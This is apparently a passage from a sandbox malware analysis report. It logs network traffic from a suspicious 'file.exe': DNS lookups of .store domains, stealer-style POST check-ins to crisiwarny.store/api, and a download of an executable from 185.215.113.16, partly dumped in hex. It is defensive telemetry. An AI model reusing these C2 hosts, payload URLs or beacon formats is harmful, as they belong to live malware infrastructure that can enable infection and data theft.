                                                                                  Oct 27, 2024 08:52:32.386526108 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.386535883 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.386564970 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.386596918 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.386607885 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.386642933 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.386744022 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.386754990 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.386760950 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.386802912 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.414891005 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415035009 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415052891 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415066004 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415076971 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415083885 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415095091 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415107012 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415117979 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415210962 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415222883 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415232897 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415246010 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415247917 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.415249109 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.415249109 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.415249109 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.415249109 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.415344954 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415364981 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415376902 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415389061 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415410042 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415409088 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.415409088 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.415409088 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.415456057 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.415585041 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415597916 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415608883 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415621042 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415638924 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.415678978 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.415734053 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415746927 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415765047 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415779114 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415802002 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.415834904 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.415839911 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415894985 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415937901 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415939093 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.415951967 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.415993929 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.416052103 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416064978 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416075945 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416090012 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416107893 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.416141033 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.416172981 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416199923 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416210890 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416240931 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.416409969 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416450977 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416456938 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.416465044 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416512966 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.416552067 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416565895 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416575909 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416588068 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416610003 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.416642904 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.416800976 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416814089 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416825056 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416852951 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.416901112 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416949987 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.416954041 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.416968107 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.417013884 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.417208910 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.417222023 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.417263985 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.417282104 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.417299986 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.417309999 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.417321920 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.417334080 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.417344093 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.417349100 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.417356968 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.417371988 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.417397022 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.417546988 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.417566061 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.417579889 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.417598009 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.417629957 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.417737007 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.417748928 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.417758942 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.417788029 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.456808090 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.456820965 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.456831932 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.456878901 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.456891060 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.456903934 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.456911087 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.456983089 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.456995964 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.456995964 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.457032919 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.491283894 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.491328955 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.491339922 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.491393089 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.491394043 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.491440058 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.491455078 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.491465092 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.491477013 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.491499901 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.491538048 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.491548061 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.491559029 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.491569042 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.491576910 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:32.491600037 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:32.491636992 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:33.236630917 CET4976980192.168.2.7185.215.113.16

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 27, 2024 08:52:10.460160971 CET6146153192.168.2.71.1.1.1
                                                                                  Oct 27, 2024 08:52:10.477051020 CET53614611.1.1.1192.168.2.7
                                                                                  Oct 27, 2024 08:52:10.481998920 CET6220953192.168.2.71.1.1.1
                                                                                  Oct 27, 2024 08:52:10.496263027 CET53622091.1.1.1192.168.2.7

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Oct 27, 2024 08:52:10.460160971 CET192.168.2.71.1.1.10x6427Standard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                                  Oct 27, 2024 08:52:10.481998920 CET192.168.2.71.1.1.10x4fdStandard query (0)crisiwarny.storeA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Oct 27, 2024 08:52:10.477051020 CET1.1.1.1192.168.2.70x6427Name error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                                  Oct 27, 2024 08:52:10.496263027 CET1.1.1.1192.168.2.70x4fdNo error (0)crisiwarny.store104.21.95.91A (IP address)IN (0x0001)false
                                                                                  Oct 27, 2024 08:52:10.496263027 CET1.1.1.1192.168.2.70x4fdNo error (0)crisiwarny.store172.67.170.64A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • crisiwarny.store
                                                                                  • 185.215.113.16

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.749769185.215.113.16807160C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 27, 2024 08:52:25.595875025 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Host: 185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.520282984 CET1236INHTTP/1.1 200 OK
                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                  Date: Sun, 27 Oct 2024 07:52:26 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 2798080
                                                                                  Last-Modified: Sun, 27 Oct 2024 07:37:46 GMT
                                                                                  Connection: keep-alive
                                                                                  ETag: "671dedca-2ab200"
                                                                                  Accept-Ranges: bytes
                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 4d 58 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                  Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$ + `@ `+MX+`Ui` @ @.rsrc`2@.idata 8@vgffvxyy`*R*:@exxzjjll +*@.taggant@ +"*@
                                                                                  Oct 27, 2024 08:52:26.520299911 CET112INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Oct 27, 2024 08:52:26.520325899 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Oct 27, 2024 08:52:26.520332098 CET212INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Oct 27, 2024 08:52:26.520335913 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Oct 27, 2024 08:52:26.520339012 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Oct 27, 2024 08:52:26.520347118 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Oct 27, 2024 08:52:26.520466089 CET236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Oct 27, 2024 08:52:26.520484924 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Oct 27, 2024 08:52:26.520498991 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Oct 27, 2024 08:52:26.525712013 CET1236INData Raw: 65 1d 6e e4 e6 31 b1 58 7a d2 f8 8e 37 36 4c 4d d5 b8 b0 82 7c 26 a2 d0 42 62 bc e7 2b 71 b9 aa 78 17 ed b1 33 c9 a4 ee 68 68 5f 3a 76 79 b3 cc 9b ce a9 a5 e1 64 b6 9e f7 7a b8 0c 5d 4e f1 e6 52 10 b1 15 32 30 8b fc 13 1d 43 91 7c 80 a5 8d 6f 69
                                                                                  Data Ascii: en1Xz76LM|&Bb+qx3hh_:vydz]NR20C|oi#:zO:v*Ooe3,pj81|[3pj8~s[7pM^35}wp=]YrEo9\=kN~ua3U;byU6#rF=(2f


                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.749700104.21.95.914437160C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-27 07:52:11 UTC263OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 8
                                                                                  Host: crisiwarny.store
                                                                                  2024-10-27 07:52:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                  Data Ascii: act=life
                                                                                  2024-10-27 07:52:12 UTC1014INHTTP/1.1 200 OK
                                                                                  Date: Sun, 27 Oct 2024 07:52:12 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=mmhu369vjl4olr9dj4n5s82utj; expires=Thu, 20 Feb 2025 01:38:51 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CAG9Q%2BfqvLqiiVByHSljreQPArJOoKasE2u%2BjazEZSCbGKJwSIrp5MZ8hjAUTdkIC144%2BFe%2FSbO5pSqWSujjLBNJcBIXXdPFIVFBMLt1%2FwbAYtZI%2Bl9tzVxlTd3HjGbXboai"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8d911af1f964e7a2-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1304&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=2148367&cwnd=251&unsent_bytes=0&cid=61c2556d7c476ae6&ts=1171&x=0"
                                                                                  2024-10-27 07:52:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                  Data Ascii: 2ok
                                                                                  2024-10-27 07:52:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.749702104.21.95.914437160C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-27 07:52:13 UTC264OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 52
                                                                                  Host: crisiwarny.store
                                                                                  2024-10-27 07:52:13 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                                  2024-10-27 07:52:13 UTC1011INHTTP/1.1 200 OK
                                                                                  Date: Sun, 27 Oct 2024 07:52:13 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=kkbiv9i1ptu0f5m542648rgn6f; expires=Thu, 20 Feb 2025 01:38:52 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2FIFaXcAZemIy%2BltAe6eogKZNkIjK4%2BmVdopV6paB71jSo%2Ft7gGOChMYajGtJqFxz1zfIhuzmYZK0gd66x8Mr62R2IyI8m0HlGi5pvu4GLBaj0x7dhepwtq2f96iK86E2%2F7p"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8d911afbad84287f-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1089&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=952&delivery_rate=2448013&cwnd=235&unsent_bytes=0&cid=f415fc7b796e0f7b&ts=523&x=0"
                                                                                  2024-10-27 07:52:13 UTC358INData Raw: 32 64 63 30 0d 0a 4e 76 4d 48 7a 7a 5a 55 43 73 70 69 70 75 43 4d 4e 57 65 66 36 59 49 4c 42 78 65 32 42 7a 5a 77 6b 69 62 79 46 69 63 52 71 4a 5a 4e 30 58 48 74 44 47 41 6d 36 42 48 44 77 72 5a 42 46 65 71 4d 72 69 6c 6d 63 35 51 39 55 42 48 2b 56 5a 63 36 42 57 66 46 74 41 79 56 5a 71 4e 46 4d 53 62 6f 42 39 37 43 74 6d 34 63 76 59 7a 73 4b 54 30 31 30 32 31 55 45 66 35 45 6b 33 31 49 59 63 54 31 58 70 39 67 70 31 4d 33 62 71 73 4f 79 34 58 70 55 41 62 31 68 2b 74 6d 62 33 71 55 4b 78 51 56 36 41 54 49 4e 47 70 30 33 50 64 37 6b 6e 53 6b 46 43 6b 6d 73 55 44 44 6a 71 34 50 52 66 36 4d 34 47 64 68 63 39 31 76 58 68 6a 32 52 5a 5a 38 56 33 6a 4f 2f 6c 36 52 59 36 5a 5a 50 6e 71 6d 42 4d 79 4f 37 31 6f 47 76 63 57 67 62 6e 30 31 6a 43 55 48 49 50 4e 56 67
                                                                                  Data Ascii: 2dc0NvMHzzZUCspipuCMNWef6YILBxe2BzZwkibyFicRqJZN0XHtDGAm6BHDwrZBFeqMrilmc5Q9UBH+VZc6BWfFtAyVZqNFMSboB97Ctm4cvYzsKT01021UEf5Ek31IYcT1Xp9gp1M3bqsOy4XpUAb1h+tmb3qUKxQV6ATINGp03Pd7knSkFCkmsUDDjq4PRf6M4Gdhc91vXhj2RZZ8V3jO/l6RY6ZZPnqmBMyO71oGvcWgbn01jCUHIPNVg
                                                                                  2024-10-27 07:52:13 UTC1369INData Raw: 43 4d 2b 4a 36 30 55 4f 39 49 62 74 61 57 68 2f 32 32 5a 55 46 66 70 4f 6e 33 35 42 66 73 66 79 56 4a 45 6c 34 78 51 78 63 4f 68 59 68 4b 48 72 52 77 4c 78 6e 61 4a 54 4a 57 71 61 66 42 51 56 2f 41 54 49 4e 45 31 32 79 66 64 66 6e 6d 61 6c 58 79 52 6f 75 67 62 4a 68 2f 78 52 41 50 4f 42 34 33 74 76 65 39 4a 6d 58 52 6e 35 51 5a 64 77 42 54 32 4b 38 30 7a 52 50 65 31 31 4f 32 4f 6b 43 74 4f 43 72 6b 68 4c 35 4d 76 6e 5a 53 55 74 6c 47 46 56 46 76 46 41 6e 6e 70 42 66 38 7a 36 57 5a 35 6a 70 31 51 78 59 71 41 49 78 59 2f 6c 57 41 58 34 68 75 52 76 61 58 54 52 4a 52 70 53 39 31 7a 51 4c 41 56 64 7a 66 64 47 30 31 43 75 57 6a 68 76 76 6b 44 62 7a 50 63 58 41 76 48 4c 75 43 6c 72 63 4e 74 33 56 51 44 31 53 6f 4a 34 51 48 58 48 39 31 71 52 59 4b 70 5a 4f 47 36
                                                                                  Data Ascii: CM+J60UO9IbtaWh/22ZUFfpOn35BfsfyVJEl4xQxcOhYhKHrRwLxnaJTJWqafBQV/ATINE12yfdfnmalXyRougbJh/xRAPOB43tve9JmXRn5QZdwBT2K80zRPe11O2OkCtOCrkhL5MvnZSUtlGFVFvFAnnpBf8z6WZ5jp1QxYqAIxY/lWAX4huRvaXTRJRpS91zQLAVdzfdG01CuWjhvvkDbzPcXAvHLuClrcNt3VQD1SoJ4QHXH91qRYKpZOG6
